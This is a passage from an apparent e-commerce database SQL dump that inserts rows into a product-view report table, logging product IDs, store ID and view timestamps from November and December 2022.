(2820, NULL, NULL, 2064, 1, '2022-11-11 19:45:14'),
(2821, NULL, NULL, 2062, 1, '2022-11-11 19:45:26'),
(2822, NULL, NULL, 2055, 1, '2022-11-11 19:45:28'),
(2823, NULL, NULL, 2059, 1, '2022-11-11 19:45:33'),
(2824, NULL, NULL, 2063, 1, '2022-11-11 19:45:35'),
(2825, NULL, NULL, 2061, 1, '2022-11-11 19:45:38'),
(2826, NULL, NULL, 2054, 1, '2022-11-11 19:45:42'),
(2827, NULL, NULL, 2060, 1, '2022-11-11 19:45:45'),
(2828, NULL, NULL, 2053, 1, '2022-11-11 19:46:02'),
(2829, NULL, NULL, 2058, 1, '2022-11-11 19:46:22'),
(2830, NULL, NULL, 2063, 1, '2022-11-12 18:04:15'),
(2831, NULL, NULL, 2062, 1, '2022-11-12 19:02:04'),
(2832, NULL, NULL, 2054, 1, '2022-11-13 06:22:23'),
(2833, NULL, NULL, 2064, 1, '2022-11-14 14:56:15'),
(2834, NULL, NULL, 2064, 1, '2022-11-14 16:26:27'),
(2835, NULL, NULL, 2064, 1, '2022-11-14 19:38:46'),
(2836, NULL, NULL, 2060, 1, '2022-11-14 22:46:05'),
(2837, NULL, NULL, 2064, 1, '2022-11-15 02:57:12'),
(2838, NULL, NULL, 2059, 1, '2022-11-15 03:11:52'),
(2839, NULL, NULL, 2061, 1, '2022-11-15 06:39:48'),
(2840, NULL, NULL, 2063, 1, '2022-11-15 07:39:52'),
(2841, NULL, NULL, 2054, 1, '2022-11-15 07:39:54'),
(2842, NULL, NULL, 2060, 1, '2022-11-15 11:40:28'),
(2843, NULL, NULL, 2060, 1, '2022-11-15 11:48:11'),
(2844, NULL, NULL, 2053, 1, '2022-11-15 18:55:35'),
(2845, NULL, NULL, 2060, 1, '2022-11-16 02:07:04'),
(2846, NULL, NULL, 2063, 1, '2022-11-16 02:08:55'),
(2847, NULL, NULL, 2058, 1, '2022-11-16 02:13:24'),
(2848, NULL, NULL, 2055, 1, '2022-11-16 02:21:59'),
(2849, NULL, NULL, 2061, 1, '2022-11-16 02:40:58'),
(2850, NULL, NULL, 2062, 1, '2022-11-16 02:51:20'),
(2851, NULL, NULL, 2054, 1, '2022-11-16 03:08:36'),
(2852, NULL, NULL, 2059, 1, '2022-11-16 03:11:39'),
(2853, NULL, NULL, 2064, 1, '2022-11-16 03:13:58'),
(2854, NULL, NULL, 2058, 1, '2022-11-16 06:50:57'),
(2855, NULL, NULL, 2064, 1, '2022-11-16 10:07:42'),
(2856, NULL, NULL, 2055, 1, '2022-11-16 11:33:49'),
(2857, NULL, NULL, 2054, 1, '2022-11-16 16:15:33'),
(2858, NULL, NULL, 2061, 1, '2022-11-17 03:02:05'),
(2859, NULL, NULL, 2060, 1, '2022-11-17 07:27:46'),
(2860, NULL, NULL, 2055, 1, '2022-11-17 08:45:08'),
(2861, NULL, NULL, 2053, 1, '2022-11-17 13:49:18'),
(2862, NULL, NULL, 2059, 1, '2022-11-17 14:20:04'),
(2863, NULL, NULL, 2063, 1, '2022-11-17 17:01:50'),
(2864, NULL, NULL, 2054, 1, '2022-11-17 22:25:53'),
(2865, NULL, NULL, 2063, 1, '2022-11-18 06:01:19'),
(2866, NULL, NULL, 2062, 1, '2022-11-18 12:59:19'),
(2867, NULL, NULL, 2060, 1, '2022-11-18 16:13:45'),
(2868, NULL, NULL, 2055, 1, '2022-11-18 17:17:15'),
(2869, NULL, NULL, 2059, 1, '2022-11-19 02:58:39'),
(2870, NULL, NULL, 2064, 1, '2022-11-19 07:59:22'),
(2871, NULL, NULL, 2058, 1, '2022-11-19 09:57:45'),
(2872, NULL, NULL, 2060, 1, '2022-11-19 09:58:52'),
(2873, NULL, NULL, 2064, 1, '2022-11-19 13:01:40'),
(2874, NULL, NULL, 2063, 1, '2022-11-19 13:01:54'),
(2875, NULL, NULL, 2062, 1, '2022-11-19 13:02:03'),
(2876, NULL, NULL, 2061, 1, '2022-11-19 13:02:15'),
(2877, NULL, NULL, 2060, 1, '2022-11-19 13:02:27'),
(2878, NULL, NULL, 2059, 1, '2022-11-19 13:02:38'),
(2879, NULL, NULL, 2058, 1, '2022-11-19 13:02:50'),
(2880, NULL, NULL, 2055, 1, '2022-11-19 13:03:01'),
(2881, NULL, NULL, 2054, 1, '2022-11-19 13:03:13'),
(2882, NULL, NULL, 2053, 1, '2022-11-19 13:19:26'),
(2883, NULL, NULL, 2064, 1, '2022-11-19 18:10:40'),
(2884, NULL, NULL, 2064, 1, '2022-11-20 04:43:49'),
(2885, NULL, NULL, 2063, 1, '2022-11-20 07:20:15'),
(2886, NULL, NULL, 2062, 1, '2022-11-20 07:20:35'),
(2887, NULL, NULL, 2054, 1, '2022-11-20 10:19:15'),
(2888, NULL, NULL, 2064, 1, '2022-11-20 14:06:42'),
(2889, NULL, NULL, 2053, 1, '2022-11-20 20:08:14'),
(2890, NULL, NULL, 2062, 1, '2022-11-20 22:19:02'),
(2891, NULL, NULL, 2062, 1, '2022-11-20 22:19:17'),
(2892, NULL, NULL, 2064, 1, '2022-11-21 02:09:18'),
(2893, NULL, NULL, 2053, 1, '2022-11-21 03:11:23'),
(2894, NULL, NULL, 2055, 1, '2022-11-21 09:08:18'),
(2895, NULL, NULL, 2058, 1, '2022-11-21 09:08:19'),
(2896, NULL, NULL, 2059, 1, '2022-11-21 13:03:06'),
(2897, NULL, NULL, 2064, 1, '2022-11-21 13:20:09'),
(2898, NULL, NULL, 2054, 1, '2022-11-21 16:17:31'),
(2899, NULL, NULL, 2055, 1, '2022-11-21 16:18:04'),
(2900, NULL, NULL, 2064, 1, '2022-11-21 16:20:11'),
(2901, NULL, NULL, 2063, 1, '2022-11-21 16:20:43'),
(2902, NULL, NULL, 2062, 1, '2022-11-21 16:21:15'),
(2903, NULL, NULL, 2060, 1, '2022-11-21 16:21:48'),
(2904, NULL, NULL, 2059, 1, '2022-11-21 16:22:21'),
(2905, NULL, NULL, 2061, 1, '2022-11-21 16:22:53'),
(2906, NULL, NULL, 2058, 1, '2022-11-21 16:23:26'),
(2907, NULL, NULL, 2058, 1, '2022-11-22 04:46:06'),
(2908, NULL, NULL, 2063, 1, '2022-11-22 08:23:59'),
(2909, NULL, NULL, 2059, 1, '2022-11-22 09:15:22'),
(2910, NULL, NULL, 2061, 1, '2022-11-22 09:30:36'),
(2911, NULL, NULL, 2054, 1, '2022-11-22 10:31:30'),
(2912, NULL, NULL, 2061, 1, '2022-11-22 13:36:49'),
(2913, NULL, NULL, 2061, 1, '2022-11-22 13:36:56'),
(2914, NULL, NULL, 2059, 1, '2022-11-22 14:46:54'),
(2915, NULL, NULL, 2064, 1, '2022-11-22 16:03:18'),
(2916, NULL, NULL, 2054, 1, '2022-11-22 22:38:21'),
(2917, NULL, NULL, 2059, 1, '2022-11-22 23:07:40'),
(2918, NULL, NULL, 2064, 1, '2022-11-23 01:40:29'),
(2919, NULL, NULL, 2053, 1, '2022-11-23 10:47:12'),
(2920, NULL, NULL, 2063, 1, '2022-11-23 12:40:23'),
(2921, NULL, NULL, 2055, 1, '2022-11-23 14:29:26'),
(2922, NULL, NULL, 2061, 1, '2022-11-24 22:50:47'),
(2923, NULL, NULL, 2054, 1, '2022-11-25 05:42:28'),
(2924, NULL, NULL, 2064, 1, '2022-11-25 09:26:18'),
(2925, NULL, NULL, 2054, 1, '2022-11-25 11:18:01'),
(2926, NULL, NULL, 2059, 1, '2022-11-26 00:54:21'),
(2927, NULL, NULL, 2062, 1, '2022-11-26 05:01:03'),
(2928, NULL, NULL, 2055, 1, '2022-11-26 08:24:42'),
(2929, NULL, NULL, 2060, 1, '2022-11-26 22:26:27'),
(2930, NULL, NULL, 2054, 1, '2022-11-26 23:43:04'),
(2931, NULL, NULL, 2064, 1, '2022-11-27 03:39:54'),
(2932, NULL, NULL, 2054, 1, '2022-11-27 03:45:45'),
(2933, NULL, NULL, 2064, 1, '2022-11-27 03:45:47'),
(2934, NULL, NULL, 2058, 1, '2022-11-27 03:45:53'),
(2935, NULL, NULL, 2063, 1, '2022-11-27 03:45:56'),
(2936, NULL, NULL, 2055, 1, '2022-11-27 03:45:57'),
(2937, NULL, NULL, 2061, 1, '2022-11-27 03:45:58'),
(2938, NULL, NULL, 2060, 1, '2022-11-27 03:45:59'),
(2939, NULL, NULL, 2059, 1, '2022-11-27 03:46:01'),
(2940, NULL, NULL, 2063, 1, '2022-11-27 06:32:28'),
(2941, NULL, NULL, 2054, 1, '2022-11-27 08:50:03'),
(2942, NULL, NULL, 2064, 1, '2022-11-27 13:40:17'),
(2943, NULL, NULL, 2060, 1, '2022-11-27 14:54:54'),
(2944, NULL, NULL, 2053, 1, '2022-11-27 19:05:44'),
(2945, NULL, NULL, 2063, 1, '2022-11-27 20:32:28'),
(2946, NULL, NULL, 2054, 1, '2022-11-28 00:05:19'),
(2947, NULL, NULL, 2055, 1, '2022-11-29 11:25:38'),
(2948, NULL, NULL, 2058, 1, '2022-11-29 14:19:09'),
(2949, NULL, NULL, 2058, 1, '2022-11-29 14:19:28'),
(2950, NULL, NULL, 2060, 1, '2022-11-29 14:39:08'),
(2951, NULL, NULL, 2061, 1, '2022-11-29 14:47:13'),
(2952, NULL, NULL, 2059, 1, '2022-11-29 16:19:11'),
(2953, NULL, NULL, 2060, 1, '2022-11-29 23:48:45'),
(2954, NULL, NULL, 2063, 1, '2022-11-30 00:00:14'),
(2955, NULL, NULL, 2058, 1, '2022-11-30 00:29:37'),
(2956, NULL, NULL, 2055, 1, '2022-11-30 01:22:45'),
(2957, NULL, NULL, 2064, 1, '2022-11-30 01:45:20'),
(2958, NULL, NULL, 2055, 1, '2022-11-30 01:49:24'),
(2959, NULL, NULL, 2061, 1, '2022-11-30 02:49:25'),
(2960, NULL, NULL, 2062, 1, '2022-11-30 02:51:12'),
(2961, NULL, NULL, 2062, 1, '2022-11-30 03:33:55'),
(2962, NULL, NULL, 2059, 1, '2022-11-30 03:37:46'),
(2963, NULL, NULL, 2054, 1, '2022-11-30 04:52:27'),
(2964, NULL, NULL, 2059, 1, '2022-11-30 05:09:32'),
(2965, NULL, NULL, 2064, 1, '2022-11-30 05:23:28'),
(2966, NULL, NULL, 2064, 1, '2022-11-30 11:22:27'),
(2967, NULL, NULL, 2059, 1, '2022-11-30 18:21:59'),
(2968, NULL, NULL, 2053, 1, '2022-11-30 22:33:34'),
(2969, NULL, NULL, 2060, 1, '2022-12-01 05:34:37'),
(2970, NULL, NULL, 2064, 1, '2022-12-01 15:39:35'),
(2971, NULL, NULL, 2054, 1, '2022-12-01 16:11:32'),
(2972, NULL, NULL, 2055, 1, '2022-12-01 16:11:41'),
(2973, NULL, NULL, 2064, 1, '2022-12-01 16:12:02'),
(2974, NULL, NULL, 2063, 1, '2022-12-01 16:12:12'),
(2975, NULL, NULL, 2062, 1, '2022-12-01 16:12:22'),
(2976, NULL, NULL, 2060, 1, '2022-12-01 16:12:28'),
(2977, NULL, NULL, 2059, 1, '2022-12-01 16:12:37'),
(2978, NULL, NULL, 2061, 1, '2022-12-01 16:12:44'),
(2979, NULL, NULL, 2058, 1, '2022-12-01 16:12:51'),
(2980, NULL, NULL, 2054, 1, '2022-12-02 01:32:38'),
(2981, NULL, NULL, 2055, 1, '2022-12-02 01:32:50'),
(2982, NULL, NULL, 2064, 1, '2022-12-02 01:33:18'),
(2983, NULL, NULL, 2063, 1, '2022-12-02 01:33:32'),
(2984, NULL, NULL, 2062, 1, '2022-12-02 01:33:41'),
(2985, NULL, NULL, 2060, 1, '2022-12-02 01:33:47'),
(2986, NULL, NULL, 2059, 1, '2022-12-02 01:33:53'),
(2987, NULL, NULL, 2061, 1, '2022-12-02 01:34:00'),
(2988, NULL, NULL, 2058, 1, '2022-12-02 01:34:06'),
(2989, NULL, NULL, 2059, 1, '2022-12-02 02:01:14'),
(2990, NULL, NULL, 2055, 1, '2022-12-02 02:59:41'),
(2991, NULL, NULL, 2063, 1, '2022-12-02 03:18:39'),
(2992, NULL, NULL, 2055, 1, '2022-12-02 05:24:39'),
(2993, NULL, NULL, 2054, 1, '2022-12-02 07:50:01'),
(2994, NULL, NULL, 2055, 1, '2022-12-02 07:50:33'),
(2995, NULL, NULL, 2058, 1, '2022-12-02 08:02:16'),
(2996, NULL, NULL, 2061, 1, '2022-12-02 08:03:01'),
(2997, NULL, NULL, 2060, 1, '2022-12-02 08:03:16'),
(2998, NULL, NULL, 2059, 1, '2022-12-02 08:03:55'),
(2999, NULL, NULL, 2063, 1, '2022-12-02 08:05:27'),
(3000, NULL, NULL, 2062, 1, '2022-12-02 08:18:51'),
(3001, NULL, NULL, 2064, 1, '2022-12-02 08:19:32'),
(3002, NULL, NULL, 2053, 1, '2022-12-02 09:12:01'),
(3003, NULL, NULL, 2063, 1, '2022-12-02 16:04:21'),
(3004, NULL, NULL, 2061, 1, '2022-12-02 22:49:33'),
(3005, NULL, NULL, 2054, 1, '2022-12-03 00:46:55'),
(3006, NULL, NULL, 2055, 1, '2022-12-03 00:46:56'),
(3007, NULL, NULL, 2062, 1, '2022-12-03 00:47:03'),
(3008, NULL, NULL, 2064, 1, '2022-12-03 00:47:04'),
(3009, NULL, NULL, 2063, 1, '2022-12-03 00:47:06'),
(3010, NULL, NULL, 2060, 1, '2022-12-03 00:47:07'),
(3011, NULL, NULL, 2059, 1, '2022-12-03 00:47:08'),
(3012, NULL, NULL, 2061, 1, '2022-12-03 00:47:10'),
(3013, NULL, NULL, 2058, 1, '2022-12-03 00:47:15'),
(3014, NULL, NULL, 2063, 1, '2022-12-03 14:07:55'),
(3015, NULL, NULL, 2053, 1, '2022-12-03 16:29:33'),
(3016, NULL, NULL, 2061, 1, '2022-12-03 22:49:33'),
(3017, NULL, NULL, 2064, 1, '2022-12-04 15:58:49'),
(3018, NULL, NULL, 2064, 1, '2022-12-04 18:52:36'),
(3019, NULL, NULL, 2054, 1, '2022-12-04 20:02:06'),
(3020, NULL, NULL, 2064, 1, '2022-12-04 20:03:48'),
(3021, NULL, NULL, 2061, 1, '2022-12-04 20:41:38'),
(3022, NULL, NULL, 2059, 1, '2022-12-04 20:41:41'),
(3023, NULL, NULL, 2053, 1, '2022-12-05 02:16:58'),
(3024, NULL, NULL, 2054, 1, '2022-12-05 10:34:42'),
(3025, NULL, NULL, 2059, 1, '2022-12-05 20:03:59'),
(3026, 625, NULL, 2064, 1, '2022-12-05 21:04:57'),
(3027, 625, NULL, 2063, 1, '2022-12-05 21:05:02'),
(3028, 625, NULL, 2062, 1, '2022-12-05 21:05:13'),
(3029, 625, NULL, 2061, 1, '2022-12-05 21:05:14'),
(3030, 625, NULL, 2060, 1, '2022-12-05 21:05:16'),
(3031, 625, NULL, 2059, 1, '2022-12-05 21:05:21'),
(3032, 625, NULL, 2058, 1, '2022-12-05 21:05:24'),
(3033, 625, NULL, 2055, 1, '2022-12-05 21:05:27'),
(3034, 625, NULL, 2054, 1, '2022-12-05 21:05:34'),
(3035, 625, NULL, 2053, 1, '2022-12-05 21:05:40'),
(3216, NULL, NULL, 2063, 1, '2022-12-06 05:06:32'),
(3217, NULL, NULL, 2053, 1, '2022-12-06 07:02:51'),
(3218, NULL, NULL, 2054, 1, '2022-12-06 07:02:59'),
(3219, NULL, NULL, 2055, 1, '2022-12-06 07:03:09'),
(3220, NULL, NULL, 2064, 1, '2022-12-06 07:03:38'),
(3221, NULL, NULL, 2063, 1, '2022-12-06 07:03:57'),
(3222, NULL, NULL, 2062, 1, '2022-12-06 07:04:07'),
(3223, NULL, NULL, 2060, 1, '2022-12-06 07:04:17'),
(3224, NULL, NULL, 2059, 1, '2022-12-06 07:04:30'),
(3225, NULL, NULL, 2061, 1, '2022-12-06 07:04:39'),
(3226, NULL, NULL, 2058, 1, '2022-12-06 07:04:48'),
(3227, NULL, NULL, 2063, 1, '2022-12-07 01:04:07'),
(3228, NULL, NULL, 2062, 1, '2022-12-07 06:50:46'),
(3229, NULL, NULL, 2061, 1, '2022-12-07 06:58:00'),
(3230, NULL, NULL, 2059, 1, '2022-12-07 08:31:06'),
(3231, NULL, NULL, 2060, 1, '2022-12-07 11:03:09'),
(3232, NULL, NULL, 2061, 1, '2022-12-07 12:58:28'),
(3233, NULL, NULL, 2060, 1, '2022-12-07 20:26:21'),
(3234, NULL, NULL, 2064, 1, '2022-12-07 20:47:51'),
(3235, NULL, NULL, 2055, 1, '2022-12-07 22:09:16'),
(3236, NULL, NULL, 2062, 1, '2022-12-08 04:50:13'),
(3237, NULL, NULL, 2054, 1, '2022-12-08 11:48:03'),
(3238, NULL, NULL, 2055, 1, '2022-12-08 11:48:24'),
(3239, NULL, NULL, 2064, 1, '2022-12-08 11:48:58'),
(3240, NULL, NULL, 2063, 1, '2022-12-08 11:50:00'),
(3241, NULL, NULL, 2062, 1, '2022-12-08 11:50:15'),
(3242, NULL, NULL, 2060, 1, '2022-12-08 11:50:31'),
(3243, NULL, NULL, 2059, 1, '2022-12-08 11:50:39'),
(3244, NULL, NULL, 2061, 1, '2022-12-08 11:51:00'),
(3245, NULL, NULL, 2058, 1, '2022-12-08 11:51:13'),
(3246, NULL, NULL, 2062, 1, '2022-12-08 17:02:05'),
(3247, NULL, NULL, 2062, 1, '2022-12-08 17:03:43'),
(3248, NULL, NULL, 2064, 1, '2022-12-08 20:09:37'),
(3249, NULL, NULL, 2063, 1, '2022-12-08 23:54:30'),
(3250, NULL, NULL, 2064, 1, '2022-12-09 06:57:35'),
(3251, NULL, NULL, 2064, 1, '2022-12-09 09:05:07'),
(3252, NULL, NULL, 2054, 1, '2022-12-09 11:44:44'),
(3253, NULL, NULL, 2064, 1, '2022-12-09 19:59:27'),
(3254, NULL, NULL, 2064, 1, '2022-12-10 07:17:28'),
(3255, NULL, NULL, 2061, 1, '2022-12-10 08:26:07'),
(3256, NULL, NULL, 2061, 1, '2022-12-10 11:24:34'),
(3257, NULL, NULL, 2053, 1, '2022-12-10 11:48:35'),
(3258, NULL, NULL, 2054, 1, '2022-12-10 11:48:44'),
(3259, NULL, NULL, 2055, 1, '2022-12-10 11:48:59'),
(3260, NULL, NULL, 2064, 1, '2022-12-10 11:50:22'),
(3261, NULL, NULL, 2063, 1, '2022-12-10 11:50:36'),
(3262, NULL, NULL, 2062, 1, '2022-12-10 11:50:45'),
(3263, NULL, NULL, 2060, 1, '2022-12-10 11:50:55'),
(3264, NULL, NULL, 2059, 1, '2022-12-10 11:51:05'),
(3265, NULL, NULL, 2061, 1, '2022-12-10 11:51:17'),
(3266, NULL, NULL, 2058, 1, '2022-12-10 11:51:33'),
(3267, NULL, NULL, 2061, 1, '2022-12-10 15:47:13'),
(3268, NULL, NULL, 2055, 1, '2022-12-10 19:50:50'),
(3269, NULL, NULL, 2059, 1, '2022-12-10 23:46:51');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(3270, NULL, NULL, 2063, 1, '2022-12-11 05:16:30'),
(3271, NULL, NULL, 2063, 1, '2022-12-11 05:16:39'),
(3272, NULL, NULL, 2061, 1, '2022-12-11 17:18:23'),
(3273, NULL, NULL, 2053, 1, '2022-12-11 19:30:52'),
(3274, NULL, NULL, 2064, 1, '2022-12-11 19:43:16'),
(3275, NULL, NULL, 2053, 1, '2022-12-12 05:49:37'),
(3276, NULL, NULL, 2054, 1, '2022-12-12 05:49:43'),
(3277, NULL, NULL, 2055, 1, '2022-12-12 05:49:49'),
(3278, NULL, NULL, 2064, 1, '2022-12-12 05:50:06'),
(3279, NULL, NULL, 2063, 1, '2022-12-12 05:50:15'),
(3280, NULL, NULL, 2062, 1, '2022-12-12 05:50:20'),
(3281, NULL, NULL, 2060, 1, '2022-12-12 05:50:25'),
(3282, NULL, NULL, 2059, 1, '2022-12-12 05:50:29'),
(3283, NULL, NULL, 2061, 1, '2022-12-12 05:50:33'),
(3284, NULL, NULL, 2058, 1, '2022-12-12 05:50:38'),
(3285, NULL, NULL, 2058, 1, '2022-12-12 06:33:28'),
(3286, NULL, NULL, 2063, 1, '2022-12-12 09:30:00'),
(3287, NULL, NULL, 2062, 1, '2022-12-12 09:35:11'),
(3288, NULL, NULL, 2053, 1, '2022-12-13 03:29:34'),
(3289, NULL, NULL, 2063, 1, '2022-12-13 03:34:15'),
(3290, NULL, NULL, 2062, 1, '2022-12-13 03:34:19'),
(3291, NULL, NULL, 2060, 1, '2022-12-13 03:34:22'),
(3292, NULL, NULL, 2059, 1, '2022-12-13 03:34:25'),
(3293, NULL, NULL, 2063, 1, '2022-12-13 07:04:42'),
(3294, NULL, NULL, 2060, 1, '2022-12-13 09:52:54'),
(3295, NULL, NULL, 2063, 1, '2022-12-13 10:04:58'),
(3296, NULL, NULL, 2058, 1, '2022-12-13 10:36:43'),
(3297, NULL, NULL, 2055, 1, '2022-12-13 11:36:22'),
(3298, NULL, NULL, 2055, 1, '2022-12-13 13:04:25'),
(3299, NULL, NULL, 2061, 1, '2022-12-13 13:36:19'),
(3300, NULL, NULL, 2062, 1, '2022-12-13 14:45:19'),
(3301, NULL, NULL, 2054, 1, '2022-12-13 16:44:46'),
(3302, NULL, NULL, 2059, 1, '2022-12-13 17:08:31'),
(3303, NULL, NULL, 2064, 1, '2022-12-13 17:26:08'),
(3304, NULL, NULL, 2058, 1, '2022-12-13 18:01:43'),
(3305, NULL, NULL, 2064, 1, '2022-12-13 20:05:48'),
(3306, NULL, NULL, 2060, 1, '2022-12-14 07:27:20'),
(3307, NULL, NULL, 2063, 1, '2022-12-14 07:39:10'),
(3308, NULL, NULL, 2058, 1, '2022-12-14 08:10:30'),
(3309, NULL, NULL, 2055, 1, '2022-12-14 09:08:56'),
(3310, NULL, NULL, 2061, 1, '2022-12-14 11:10:11'),
(3311, NULL, NULL, 2062, 1, '2022-12-14 12:20:37'),
(3312, NULL, NULL, 2054, 1, '2022-12-14 14:18:51'),
(3313, NULL, NULL, 2059, 1, '2022-12-14 14:41:43'),
(3314, NULL, NULL, 2064, 1, '2022-12-14 14:58:48'),
(3315, NULL, NULL, 2061, 1, '2022-12-14 16:59:36'),
(3316, NULL, NULL, 2064, 1, '2022-12-14 19:47:01'),
(3317, NULL, 61, 2061, 1, '2022-12-15 01:37:07'),
(3318, NULL, NULL, 2061, 1, '2022-12-15 04:17:19'),
(3319, NULL, NULL, 2060, 1, '2022-12-15 04:55:46'),
(3320, NULL, NULL, 2063, 1, '2022-12-15 05:11:02'),
(3321, NULL, NULL, 2058, 1, '2022-12-15 05:50:58'),
(3322, NULL, NULL, 2060, 1, '2022-12-15 06:15:49'),
(3323, NULL, NULL, 2055, 1, '2022-12-15 07:06:14'),
(3324, NULL, NULL, 2054, 1, '2022-12-15 09:37:27'),
(3325, NULL, NULL, 2055, 1, '2022-12-15 09:37:32'),
(3326, NULL, NULL, 2064, 1, '2022-12-15 09:37:43'),
(3327, NULL, NULL, 2061, 1, '2022-12-15 09:37:45'),
(3328, NULL, NULL, 2063, 1, '2022-12-15 09:37:48'),
(3329, NULL, NULL, 2062, 1, '2022-12-15 09:37:54'),
(3330, NULL, NULL, 2060, 1, '2022-12-15 09:38:00'),
(3331, NULL, NULL, 2059, 1, '2022-12-15 09:38:04'),
(3332, NULL, NULL, 2061, 1, '2022-12-15 09:38:09'),
(3333, NULL, NULL, 2058, 1, '2022-12-15 09:38:14'),
(3334, NULL, NULL, 2054, 1, '2022-12-15 09:50:13'),
(3335, NULL, NULL, 2062, 1, '2022-12-15 11:02:09'),
(3336, NULL, NULL, 2064, 1, '2022-12-15 13:25:12'),
(3337, NULL, NULL, 2054, 1, '2022-12-15 13:27:37'),
(3338, NULL, NULL, 2061, 1, '2022-12-15 13:41:03'),
(3339, NULL, NULL, 2059, 1, '2022-12-15 13:57:13'),
(3340, NULL, NULL, 2064, 1, '2022-12-15 14:19:21'),
(3341, NULL, NULL, 2063, 1, '2022-12-15 14:31:35'),
(3342, NULL, NULL, 2053, 1, '2022-12-15 19:44:32'),
(3343, NULL, NULL, 2054, 1, '2022-12-16 05:07:40'),
(3344, NULL, NULL, 2062, 1, '2022-12-16 10:01:46'),
(3345, NULL, NULL, 2055, 1, '2022-12-17 08:15:10'),
(3346, NULL, NULL, 2064, 1, '2022-12-17 21:02:36'),
(3347, NULL, NULL, 2059, 1, '2022-12-18 01:00:57'),
(3348, NULL, NULL, 2064, 1, '2022-12-18 03:58:22'),
(3349, NULL, NULL, 2055, 1, '2022-12-18 09:43:02'),
(3350, NULL, NULL, 2064, 1, '2022-12-18 10:21:17'),
(3351, NULL, NULL, 2060, 1, '2022-12-19 10:49:21'),
(3352, NULL, NULL, 2054, 1, '2022-12-20 00:47:27'),
(3353, NULL, NULL, 2063, 1, '2022-12-20 12:31:00'),
(3354, NULL, NULL, 2059, 1, '2022-12-20 14:01:36'),
(3355, NULL, NULL, 2063, 1, '2022-12-20 16:04:57'),
(3356, NULL, NULL, 2053, 1, '2022-12-21 01:39:40'),
(3357, NULL, NULL, 2064, 1, '2022-12-21 01:53:41'),
(3358, NULL, NULL, 2054, 1, '2022-12-21 02:56:29'),
(3359, NULL, NULL, 2061, 1, '2022-12-22 16:28:47'),
(3360, NULL, NULL, 2053, 1, '2022-12-22 18:54:29'),
(3361, NULL, NULL, 2064, 1, '2022-12-22 20:46:46'),
(3362, NULL, NULL, 2060, 1, '2022-12-22 21:49:31'),
(3363, NULL, NULL, 2062, 1, '2022-12-23 01:33:47'),
(3364, NULL, NULL, 2060, 1, '2022-12-23 01:39:31'),
(3365, NULL, NULL, 2062, 1, '2022-12-23 01:47:46'),
(3366, NULL, NULL, 2055, 1, '2022-12-23 01:49:44'),
(3367, NULL, NULL, 2061, 1, '2022-12-23 02:03:54'),
(3368, NULL, NULL, 2058, 1, '2022-12-23 02:42:04'),
(3369, NULL, NULL, 2064, 1, '2022-12-23 03:10:35'),
(3370, NULL, NULL, 2059, 1, '2022-12-23 03:12:23'),
(3371, NULL, NULL, 2063, 1, '2022-12-23 03:13:20'),
(3372, NULL, NULL, 2063, 1, '2022-12-23 03:13:40'),
(3373, NULL, NULL, 2054, 1, '2022-12-23 03:45:11'),
(3374, NULL, NULL, 2061, 1, '2022-12-23 04:01:53'),
(3375, NULL, NULL, 2064, 1, '2022-12-23 04:47:55'),
(3376, NULL, NULL, 2055, 1, '2022-12-23 05:21:41'),
(3377, NULL, NULL, 2058, 1, '2022-12-23 05:23:06'),
(3378, NULL, NULL, 2054, 1, '2022-12-23 06:48:29'),
(3379, NULL, NULL, 2059, 1, '2022-12-23 08:21:01'),
(3380, NULL, NULL, 2060, 1, '2022-12-23 09:02:40'),
(3381, NULL, NULL, 2062, 1, '2022-12-23 10:43:32'),
(3382, NULL, NULL, 2064, 1, '2022-12-23 16:10:48'),
(3383, NULL, NULL, 2055, 1, '2022-12-24 10:49:16'),
(3384, NULL, NULL, 2060, 1, '2022-12-24 15:44:17'),
(3385, NULL, NULL, 2063, 1, '2022-12-24 15:56:00'),
(3386, NULL, NULL, 2064, 1, '2022-12-24 15:58:01'),
(3387, NULL, NULL, 2058, 1, '2022-12-24 16:27:26'),
(3388, NULL, NULL, 2055, 1, '2022-12-24 17:28:20'),
(3389, NULL, NULL, 2061, 1, '2022-12-24 19:28:17'),
(3390, NULL, NULL, 2062, 1, '2022-12-24 20:43:03'),
(3391, NULL, NULL, 2054, 1, '2022-12-24 22:51:47'),
(3392, NULL, NULL, 2059, 1, '2022-12-24 23:15:50'),
(3393, NULL, NULL, 2064, 1, '2022-12-24 23:34:48'),
(3394, NULL, NULL, 2060, 1, '2022-12-25 01:08:05'),
(3395, NULL, NULL, 2060, 1, '2022-12-25 01:12:13'),
(3396, NULL, NULL, 2060, 1, '2022-12-25 04:11:25'),
(3397, NULL, NULL, 2063, 1, '2022-12-25 04:27:56'),
(3398, NULL, NULL, 2060, 1, '2022-12-25 04:48:03'),
(3399, NULL, NULL, 2058, 1, '2022-12-25 05:10:08'),
(3400, NULL, NULL, 2055, 1, '2022-12-25 06:39:41'),
(3401, NULL, NULL, 2064, 1, '2022-12-25 07:17:04'),
(3402, NULL, NULL, 2055, 1, '2022-12-25 08:08:04'),
(3403, NULL, NULL, 2061, 1, '2022-12-25 09:04:09'),
(3404, NULL, NULL, 2062, 1, '2022-12-25 10:28:13'),
(3405, NULL, NULL, 2063, 1, '2022-12-25 12:27:46'),
(3406, NULL, NULL, 2054, 1, '2022-12-25 12:40:09'),
(3407, NULL, NULL, 2059, 1, '2022-12-25 13:05:43'),
(3408, NULL, NULL, 2064, 1, '2022-12-25 13:25:40'),
(3409, NULL, NULL, 2060, 1, '2022-12-25 15:58:42'),
(3410, NULL, NULL, 2063, 1, '2022-12-25 16:11:10'),
(3411, NULL, NULL, 2060, 1, '2022-12-25 17:28:59'),
(3412, NULL, NULL, 2063, 1, '2022-12-25 17:47:08'),
(3413, NULL, NULL, 2058, 1, '2022-12-25 18:34:55'),
(3414, NULL, NULL, 2055, 1, '2022-12-25 20:08:50'),
(3415, NULL, NULL, 2053, 1, '2022-12-25 21:54:31'),
(3416, NULL, NULL, 2061, 1, '2022-12-25 23:12:37'),
(3417, NULL, NULL, 2062, 1, '2022-12-26 00:55:36'),
(3418, NULL, NULL, 2053, 1, '2022-12-26 01:01:25'),
(3419, NULL, NULL, 2054, 1, '2022-12-26 03:51:02'),
(3420, NULL, NULL, 2059, 1, '2022-12-26 04:24:27'),
(3421, NULL, NULL, 2064, 1, '2022-12-26 04:51:24'),
(3422, NULL, NULL, 2060, 1, '2022-12-26 06:20:03'),
(3423, NULL, NULL, 2063, 1, '2022-12-26 06:39:05'),
(3424, NULL, NULL, 2058, 1, '2022-12-26 07:33:44'),
(3425, NULL, NULL, 2055, 1, '2022-12-26 09:12:07'),
(3426, NULL, NULL, 2061, 1, '2022-12-26 11:50:51'),
